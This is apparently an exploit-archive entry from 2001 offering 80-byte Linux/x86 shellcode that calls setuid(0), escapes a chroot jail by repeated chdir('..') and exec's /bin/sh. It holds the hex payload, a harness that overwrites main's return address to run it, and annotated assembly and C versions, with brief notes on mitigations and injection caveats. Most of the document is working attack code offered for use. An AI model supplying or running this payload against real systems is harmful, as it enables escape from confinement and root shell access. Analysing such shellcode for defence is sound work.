
# Title : linux chroot()/execve() code
# Published : 2001-01-13
# Author : preedator


/* Linux/x86 chroot()/execve() shellcode, 80 bytes, no NUL bytes.          *
 * What it does (see the asm and C references below): setuid(0), mkdir() a *
 * directory inside the jail, chroot() into it, chdir("..") repeatedly to  *
 * climb out to the real root, chroot("..") and execve() /bin/sh. The      *
 * escape relies on chroot() not changing the working directory, so the    *
 * process must still hold root (CAP_SYS_CHROOT) inside the jail; the      *
 * usual mitigations are dropping privileges right after chroot() or using *
 * a mount namespace / pivot_root instead of a plain chroot(). No return   *
 * value is checked, so if mkdir() or chroot() fail the shell simply       *
 * starts inside the jail. I have some ideas how to make it smaller, but   *
 * till then use this one.                                                 *
 *                                         signed predator                 *
 *                                         linux registered user : 181116  *
 *                                         preedator(at)sendmail(dot)ru    *
 ***************************************************************************/

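/* The payload: 80 bytes, no zero bytes (strlen() == 80). Byte for byte it
 * is the assembly in the comment further down: setuid(0); mkdir("sh..",
 * 0xed); chroot("sh.."); chdir("..") 0xed times; chroot(".."); execve(
 * "/bin/sh", {"/bin/sh", NULL}, NULL). The trailing "/bin/sh.." is data the
 * code patches at run time (NUL written at offset 7, argv[] built at offset
 * 8), so the payload must live in writable memory.
 *
 * The listing as published had lost the backslashes of its \x escapes (and
 * would have been a 250+ byte ASCII string); they are restored here.
 *
 * NOTE(review): the byte stored at esi+0xa is setuid()'s return value, not
 * a guaranteed NUL, and "sh.." is only terminated here by this C literal's
 * implicit trailing zero at offset 9 -- confirm the terminator before
 * injecting the payload into a buffer that does not end with 0. */
char sc[]="\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xeb\x36\x5e\x88\x46\x0a"
          "\x8d\x5e\x05\xb1\xed\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x83"
          "\xc3\x02\xb0\x0c\xcd\x80\xe0\xfa\xb0\x3d\xcd\x80\x89\x76\x08\x31"
          "\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x89\xc2\xb0\x0b"
          "\xcd\x80\xe8\xc5\xff\xff\xff/bin/sh..";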

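/* Test harness: prints the payload length, then overwrites main()'s own
 * saved return address with the address of sc[] so that returning from
 * main() runs the shellcode in place.
 *
 * Assumptions, all of which fail on a current toolchain/kernel:
 *   - 32-bit x86 with the frame layout of a 2001-era gcc, where the saved
 *     return address sits two ints above the local `ret` (no stack
 *     protector, no reordering of locals);
 *   - sc[] is in memory that is both writable and executable (.data);
 *     with NX / W^X the jump faults instead;
 *   - `(int)sc` can hold a pointer, i.e. a 32-bit build -- on 64-bit the
 *     cast truncates the address.
 * The listing omits <stdio.h> and <string.h>; include them for a clean
 * build. Fixed here: the format string was "%dn" (no newline, and %d does
 * not match the size_t that strlen() returns).
 */
int main(){
  /* &ret + 2 skips the saved frame pointer to land on the return address */
  int *ret=(int *)(&ret+2);
  /* strlen() stops at the first NUL, so this doubles as a check that the
   * payload carries no zero byte (expected: 80). */
  printf("len : %zu\n",strlen(sc));
  *ret=(int)sc;
  return 0;
}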


// Asm code
/*
 * int main(){
 *  __asm__(" xorl %eax,%eax           \n"
 *          " xorl %ebx,%ebx           \n"
 *          " xorl %ecx,%ecx           \n"
 *          " movb $0x17,%al           \n"   // setuid(0)
 *          " int  $0x80               \n"
 *          " jmp 0x36                 \n"   // forward to the call below
 *          " popl %esi                \n"   // esi -> "/bin/sh.."
 *          " movb %al,0xa(%esi)       \n"   // al = setuid() result
 *          " leal 0x5(%esi),%ebx      \n"   // ebx -> "sh.."
 *          " movb $0xed,%cl           \n"   // mkdir mode, reused as loop count
 *          " movb $0x27,%al           \n"   // mkdir("sh..", 0xed)
 *          " int $0x80                \n"
 *          " xorl %eax,%eax           \n"
 *          " movb $0x3d,%al           \n"   // chroot("sh..")
 *          " int $0x80                \n"
 *          " addl $0x2,%ebx           \n"   // ebx -> ".."
 *          " movb $0xc,%al            \n"   // chdir("..")
 *          " int $0x80                \n"
 *          " loopne -0x06             \n"   // back to movb $0xc while --ecx != 0
 *          " movb $0x3d,%al           \n"   // chroot("..")
 *          " int $0x80                \n"
 *          " movl %esi,0x8(%esi)      \n"   // argv[0] = "/bin/sh"
 *          " xorl %eax,%eax           \n"
 *          " movb %al,0x7(%esi)       \n"   // NUL-terminate "/bin/sh"
 *          " movl %eax,0xc(%esi)      \n"   // argv[1] = NULL
 *          " movl %esi,%ebx           \n"   // ebx -> "/bin/sh"
 *          " leal 0x8(%esi),%ecx      \n"   // ecx -> argv
 *          " movl %eax,%edx           \n"   // envp = NULL
 *          " movb $0xb,%al            \n"   // execve("/bin/sh", argv, NULL)
 *          " int $0x80                \n"
 *          " call -0x3b               \n"   // pushes &"/bin/sh.." for popl above
 *          " .string \"/bin/sh..\"    \n");
 * }
 */

//C code
/*
 * int main(){
 *   char *sh[2]={"/bin/sh",NULL};
 *   int gg=0xed;                 // mkdir mode, reused as the chdir count
 *   mkdir("sh..",gg);            // new directory inside the current root
 *   chroot("sh..");              // cwd is left outside the new root
 *   while (gg!=0){
 *      chdir("..");gg--;         // climb up to the real root
 *   }
 *   chroot("..");                // re-root at the real root
 *   execve(sh[0],sh,NULL);
 * }
 */

